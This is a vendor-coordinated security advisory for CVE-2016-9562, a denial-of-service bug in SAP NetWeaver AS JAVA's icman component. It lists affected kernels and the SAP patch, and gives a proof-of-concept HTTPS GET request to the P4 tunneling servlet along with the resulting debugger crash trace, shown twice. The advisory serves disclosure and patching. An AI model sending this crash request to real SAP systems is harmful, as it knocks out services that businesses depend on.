SAP NetWeaver AS JAVA icman - DoS vulnerability (CVE-2016-9562)

Application: SAP NetWeaver AS JAVA **Versions Affected:**SAP NetWeaver AS JAVA 7.4 **Vendor URL: **SAP **Bugs: **Denial of Service **Reported: **22.04.2016 **Vendor response: **23.04.2016 **Date of Public Advisory:**09.08.2016 **Reference: **SAP Security Note 2313835 **Author: ** Vahagn Vardanyan (ERPScan)

VULNERABILITY INFORMATION

Class: Denial of Service
Impact: Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE: CVE-2016-9562

CVSS Information

CVSS Base Score v3: 7.5 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range)	Network (N)
AC: Attack Complexity (Required attack complexity)	Low (L)
PR: Privileges Required (Level of privileges needed to exploit)	None (N)
UI: User Interaction (Required user participation)	None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component)	Unhanged (U)
C: Impact to Confidentiality	None (N)
I: Impact to Integrity	None (N)
A: Impact to Availability	High (H)

Description

Anonymous attacker can use a special HTTP request to perform a DoS attack against SAP icman.

Business risk

An attacker can use a Denial of Service vulnerability to terminate a process of a vulnerable component. For this period of time, nobody can use this service, which negatively affects business processes, system downtime and, as a result, business reputation.

VULNERABLE PACKAGES

SAP KERNEL 7.21 32-BIT
SAP KERNEL 7.21 32-BIT UNICODE
SAP KERNEL 7.21 64-BIT
SAP KERNEL 7.21 64-BIT UNICODE
SAP KERNEL 7.21 EXT 32-BIT
SAP KERNEL 7.21 EXT 32-BIT UC
SAP KERNEL 7.21 EXT 64-BIT
SAP KERNEL 7.21 EXT 64-BIT UC
SAP KERNEL 7.22 64-BIT
SAP KERNEL 7.22 64-BIT UNICODE
SAP KERNEL 7.22 EXT 64-BIT
SAP KERNEL 7.22 EXT 64-BIT UC
SAP KERNEL 7.42 64-BIT
SAP KERNEL 7.42 64-BIT UNICODE
SAP KERNEL 7.45 64-BIT
SAP KERNEL 7.45 64-BIT UNICODE

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, install SAP Security Note 2313835.

TECHNICAL DESCRIPTION

Vulnerability triggers when one sends HTTPS GET request to SAP NetWeaver P4.

PoC GET https://SAP_IP:50005/sap.com~P4TunnelingApp!web/myServlet HTTP/1.1 Host: 172.16.10.65:50005 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close 0:007> r rax=0000a323260f1252 rbx=0000000025c500d0 rcx=0000000025c500d0 rdx=0000000000000001 rsi=0000000000000002 rdi=0000000000000000 rip=000000013f3af019 rsp=0000000003500d40 rbp=0000000003500e40 r8=0000000025c50400 r9=0000006c004c0002 r10=0000000003500c20 r11=00000000021b2df0 r12=0000000000000002 r13=000000013f2c0000 r14=0000000000000000 r15=0000000000000001 iopl=0 nv up ei ng nz ac po cy cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297 icman!P4PlugInReadHandler+0xb9: 00000001`3f3af019 8b4f04 mov ecx,dword ptr [rdi+4] ds:00000000`00000004=???????? 00000000`03500d40 00000001`3f363fb5 icman!P4PlugInReadHandler+0xb9 [d:\depot\bas\742_rel\src\krn\si\ic\p4_plg.c @ 1192] 00000000`03500ec0 00000001`3f3638ea icman!IcmMplxAsyncReadDone+0x75 [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 5088] 00000000`03500f10 00000001`3f362626 icman!IcmMplxExecCall+0x36a [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 4808] 00000000`0350fd20 00000000`74901d9f icman!IcmMplxThread+0x5f6 [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 3840] 00000000`0350fdb0 00000000`74901e3b MSVCR100!endthreadex+0x43 00000000`0350fde0 00000000`7716652d MSVCR100!endthreadex+0xdf 00000000`0350fe10 00000000`7729c541 kernel32!BaseThreadInitThunk+0xd 00000000`0350fe40 00000000`00000000 ntdll!RtlUserThreadStart+0x21

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

|

PoC

GET https://SAP_IP:50005/sap.com~P4TunnelingApp!web/myServlet HTTP/1.1

Host: 172.16.10.65:50005

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

0:007> r

rax=0000a323260f1252 rbx=0000000025c500d0 rcx=0000000025c500d0

rdx=0000000000000001 rsi=0000000000000002 rdi=0000000000000000

rip=000000013f3af019 rsp=0000000003500d40 rbp=0000000003500e40

r8=0000000025c50400 r9=0000006c004c0002 r10=0000000003500c20

r11=00000000021b2df0 r12=0000000000000002 r13=000000013f2c0000

r14=0000000000000000 r15=0000000000000001

iopl=0 nv up ei ng nz ac po cy

cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297

icman!P4PlugInReadHandler+0xb9:

00000001`3f3af019 8b4f04 mov ecx,dword ptr [rdi+4] ds:00000000`00000004=????????

00000000`03500d40 00000001`3f363fb5 icman!P4PlugInReadHandler+0xb9 [d:\depot\bas\742_rel\src\krn\si\ic\p4_plg.c @ 1192]

00000000`03500ec0 00000001`3f3638ea icman!IcmMplxAsyncReadDone+0x75 [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 5088]

00000000`03500f10 00000001`3f362626 icman!IcmMplxExecCall+0x36a [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 4808]

00000000`0350fd20 00000000`74901d9f icman!IcmMplxThread+0x5f6 [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 3840]

00000000`0350fdb0 00000000`74901e3b MSVCR100!endthreadex+0x43

00000000`0350fde0 00000000`7716652d MSVCR100!endthreadex+0xdf

00000000`0350fe10 00000000`7729c541 kernel32!BaseThreadInitThunk+0xd

00000000`0350fe40 00000000`00000000 ntdll!RtlUserThreadStart+0x21

—|—